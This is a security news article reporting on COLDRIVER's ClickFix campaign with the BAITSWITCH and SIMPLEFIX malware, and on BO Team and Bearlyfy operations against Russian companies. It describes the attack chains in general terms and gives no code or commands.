The latest ClickFix-style attacks have been linked to the Russian advanced persistent threat (APT) group COLDRIVER, who are behind the distribution of two new malware families known as BAITSWITCH and SIMPLEFIX.
Zscaler ThreatLabz, the cybersecurity firm that first discovered this multi-stage ClickFix campaign, has identified BAITSWITCH as a downloader that deploys the PowerShell backdoor SIMPLEFIX.
COLDRIVER, also recognized as Callisto, Star Blizzard, and UNC4057, has been targeting various sectors since 2019. Initially using spear-phishing tactics, the group has evolved to include custom tools like SPICA and LOSTKEYS, showcasing their technical capabilities.
Previous research by the Google Threat Intelligence Group (GTIG) in May 2025 highlighted COLDRIVER’s use of ClickFix techniques, employing fake CAPTCHA prompts to deliver the LOSTKEYS Visual Basic Script.
Zscaler’s security researchers Sudeep Singh and Yin Hong Chang emphasized the effectiveness of ClickFix as an infection vector in their recent report, despite its lack of novelty or sophistication.
The latest attack method involves deceiving users into running a malicious DLL disguised as a CAPTCHA check, leading to the deployment of the BAITSWITCH downloader, which fetches the SIMPLEFIX backdoor from an attacker-controlled domain. The attackers also use decoy documents hosted on Google Drive to lure victims.
Following the initial infection, the attackers execute various commands to establish persistence, store encrypted payloads, download additional PowerShell scripts, and erase traces of the ClickFix attack. The PowerShell stager then retrieves the SIMPLEFIX backdoor, enabling communication with a command-and-control server for further malicious activities.
One of the PowerShell scripts executed through SIMPLEFIX gathers information on specific file types in designated directories, similar to the LOSTKEYS malware.
Zscaler noted that COLDRIVER primarily targets NGOs, human rights defenders, and think tanks in Western regions, aligning with their victim profile.
BO Team and Bearlyfy Target Russia
Kaspersky recently observed a phishing campaign by the BO Team group targeting Russian companies, distributing a new version of the BrockenDoor backdoor and the ZeronetKit malware.
ZeronetKit, a Golang backdoor, enables remote access to compromised systems, file manipulation, command execution, and tunnel creation. The attackers use BrockenDoor to achieve persistence on infected systems.
Meanwhile, the emergence of Bearlyfy has seen ransomware attacks targeting Russian entities, with incidents involving the exploitation of vulnerabilities in Bitrix and Zerologon for initial access and privilege escalation.
Bearlyfy, active since January 2025, has targeted Russian and Belarusian companies, using encryption and data manipulation tools for immediate impact. The group’s tactics differ from the more complex APT campaigns conducted by PhantomCore, another threat actor targeting similar regions.
While there are infrastructure overlaps between Bearlyfy and PhantomCore, Bearlyfy operates independently, focusing on swift attacks with minimal preparation.
